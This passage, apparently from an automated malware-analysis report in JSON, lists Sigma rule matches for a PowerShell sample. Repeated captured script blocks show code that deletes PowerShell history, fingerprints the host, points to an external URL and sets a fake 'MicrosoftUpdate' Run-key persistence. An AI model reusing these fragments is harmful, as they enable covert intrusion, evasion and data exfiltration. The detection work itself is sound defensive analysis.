"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "75df0b220ddaf477070a84227ba8e5430f5d4bbcfdfe1ad41ca6da62894c03ed",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Clear PowerShell History - PowerShell",
"rule_description": "Detects keywords that could indicate clearing PowerShell history",
"rule_author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "8b5db9da5732dc549b0e8b56fe5933d7c95ed760f3ac20568ab95347ef8c5bcc",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "CurrentVersion Autorun Keys Modification",
"rule_description": "Detects modification of autostart extensibility point (ASEP) in registry.",
"rule_author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)",
"match_context": [
{
"values": {
"RuleName": "T1060,RunKey",
"EventID": "13",
"EventType": "SetValue",
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Details": "C:\\ProgramData\\system.bat",
"TargetObject": "HKU\\S-1-5-21-4270068108-2931534202-3907561125-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftUpdate"
}
},
{
"values": {
"Details": "C:\\ProgramData\\system.bat",
"EventType": "SetValue",
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "13",
"TargetObject": "HKU\\S-1-5-21-4005801669-2598574594-602355426-1001\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftUpdate"
}
},
{
"values": {
"EventID": "13",
"Details": "C:\\ProgramData\\system.bat",
"EventType": "SetValue",
"TargetObject": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftUpdate"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "bda626dd3bfb65bcce23cf31a18f15b58628dc48b2bb5cd9fe5f9ea5f9a3cc8c",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential Binary Or Script Dropper Via PowerShell",
"rule_description": "Detects PowerShell creating a binary executable or a script file.",
"rule_author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\ProgramData\\system.bat",
"EventID": "11"
}
},
{
"values": {
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\ProgramData\\system.bat",
"EventID": "11"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "ece68c3b6fda1fe5c7d8707c5dd9099cf564ed0e7e7b480e97278c475f10e5a7",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Powershell Execute Batch Script",
"rule_description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "80e1441e8251586c742da610b4bceb4d94fbe79f4e8b64b9745b6a11da90d7c1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PowerShell Script With File Upload Capabilities",
"rule_description": "Detects PowerShell scripts leveraging the \"Invoke-WebRequest\" cmdlet to send data via either \"PUT\" or \"POST\" method.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "c085cde9af85b182e783b8d7b42d66d3d0efe08696b4fe7946da3d5d1a2cd51e",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential PowerShell Obfuscation Using Alias Cmdlets",
"rule_description": "Detects Set-Alias or New-Alias cmdlet usage, which can be used as a means to obfuscate PowerShell scripts",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Set-Alias -Name ncim -Value New-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue",
"Path": "",
"ScriptBlockId": "f4b3f7db-d120-408e-bced-000fae879427",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "c0ad3fd3010dc41b8f54cd4f911b4bf081d2d195b0e7548cdc60ebcee9250ad3",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Get Current User",
"rule_description": "Detects the use of PowerShell to identify the current logged user.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
}
],
"ssdeep": "384:awUjo2srpPAHkK8w/GQREpnsCzNzz+Dq6husy:awwksDApscFsq6husy",
"type_tags": [
"source",
"powershell",
"ps",
"ps1"
],
"total_votes": {
"harmless": 0,
"malicious": 0
},
"last_analysis_date": 1781830002,
"sha256": "50eae63d3e24be9ca8803f4b5a0408aef97ee3fab7af018d8c2dde7c359edd65",
"size": 12742
}
}
}